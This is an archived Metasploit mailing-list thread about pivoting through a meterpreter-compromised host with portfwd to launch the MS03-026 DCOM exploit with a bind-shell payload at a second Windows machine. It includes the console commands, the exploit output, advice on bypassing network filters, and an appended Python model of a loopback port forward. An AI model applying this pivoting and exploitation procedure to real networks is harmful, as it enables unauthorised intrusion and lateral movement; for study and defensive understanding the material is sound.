Metasploit mailing list archives
use of meterpreter
From: mmiller at hick.org (mmiller at hick.org)
Date: Thu, 14 Apr 2005 02:34:57 -0500
On Thu, Apr 14, 2005 at 09:10:12AM +0200, Thomas Werth wrote:
> 1. Exploited "proxy victim" with metasploit's meterpreter payload.
> 2. In meterpreter "shell" I'm adding some portfwd's like this:
>    - portfwd -a -l 9500 -h 'nextTargetIP' -p 135
>    - portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P   //-P is just another test in hope it will work this time ...
> 3. Now I'm using msrpc exploit with win32_bind payload. Setting options:
>
> msf msrpc_dcom_ms03_026(win32_bind) > show options
>
> Exploit and Payload Options
> ===========================
>
> Exploit:  Name      Default       Description
> --------  ------    -----------   ------------------
> required  RHOST     'ProxyHost'   The target address
> required  RPORT     9500          The target port
>
> Payload:  Name      Default   Description
> --------  --------  -------   ------------------------------------------
> required  EXITFUNC  thread    Exit technique: "process", "thread", "seh"
> required  LPORT     4444      Listening port for bind shell
>
> Target: Windows NT SP6/2K/XP/2K3 ALL
>
> 4. Now launching exploit:
>
> msf msrpc_dcom_ms03_026(win32_bind) > exploit
>
> 5. That's where it hangs:
>
> [*] Starting Bind Handler.
> [*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444
>
> 6. Waited long enough, killed connection with Ctrl-C:
>
> Caught interrupt, exit connection? [y/n] y
> [*] Exiting Bind Handler.
>
> What am I doing wrong, or isn't it possible to use portfwd so attacks can be redirected through a proxy?
The thing to note is that connections are proxied from your local machine through the meterpreter connection to the target that you are trying to reach. In the example you provided above, it appears that you are expecting the port forwards to be listening on the proxy host that you initially exploited. Instead, you should expect the port forward listeners to be listening on your local machine.

All of the steps you performed were correct, except instead of using 'ProxyHost' you should use 127.0.0.1 for RHOST. I imagine the reason the bind handler got a connection is because you exploited the 'ProxyHost' with win32_bind (using port 4444).

The reason connections are proxied starting from your local machine is because this allows you to transparently bypass any sort of inbound or outbound filters (since it tunnels through the already established meterpreter communication channel).

Hope that helps!
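The mechanism described in the reply above, as an added illustration that is not part of this thread and not Metasploit's or meterpreter's own code: a local port forward binds its listener on 127.0.0.1 on the operator's machine, and each accepted connection is relayed onward from the pivot to the second host. In meterpreter the second leg travels inside the existing session channel; this stand-alone model replaces that channel with a plain TCP connection, and the "next target" service is a constructed loopback echo server recording which peer it saw. All function names and the loopback addresses are assumptions of this example. The defender-relevant consequence it makes visible is that the second host only ever sees a connection from the pivot, so host and network logs on the second machine will show the pivot, not the operator, as the source.

```python
import socket
import threading
from typing import List, Tuple

# Constructed stand-in for the service on the "next target" (port 135 in the
# thread): echoes one request and records the peer address it observed.
def start_echo_server(seen_peers: List[Tuple[str, int]]) -> int:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # kernel picks a free port
    srv.listen(5)

    def serve() -> None:
        while True:
            conn, peer = srv.accept()
            seen_peers.append(peer)      # who the target thinks is talking to it
            with conn:
                data = conn.recv(4096)
                if data:
                    conn.sendall(data)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until src closes, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


# Model of "portfwd -a -l <listen_port> -h <target_host> -p <target_port>":
# the listener lives on the local machine (127.0.0.1), not on the pivot.
# Hypothetical helper; returns the (host, port) the listener is bound to.
def start_local_forward(target_host: str, target_port: int,
                        listen_port: int = 0) -> Tuple[str, int]:
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", listen_port))
    listener.listen(5)

    def accept_loop() -> None:
        while True:
            client, _ = listener.accept()
            try:
                # In meterpreter this connect happens on the pivot, inside the
                # session channel; here it is a direct socket (simplification).
                upstream = socket.create_connection((target_host, target_port), timeout=5)
            except OSError:
                client.close()
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener.getsockname()


# What the exploit module does when RHOST is 127.0.0.1 and RPORT is the
# forwarded port: talk to the local listener and read back the reply.
def probe(listen_port: int, payload: bytes) -> bytes:
    with socket.create_connection(("127.0.0.1", listen_port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            c = s.recv(4096)
            if not c:
                break
            chunks.append(c)
    return b"".join(chunks)


if __name__ == "__main__":
    peers: List[Tuple[str, int]] = []
    target_port = start_echo_server(peers)
    bound_host, bound_port = start_local_forward("127.0.0.1", target_port)
    print(f"listener is on {bound_host}:{bound_port} (local machine, not the pivot)")
    print("reply via forward:", probe(bound_port, b"ping"))
    print("target saw peer:", peers[0])
```

Pointing the module at the pivot's address with this port, as in the original question, fails because nothing listens there; the forward is only reachable on the local loopback address.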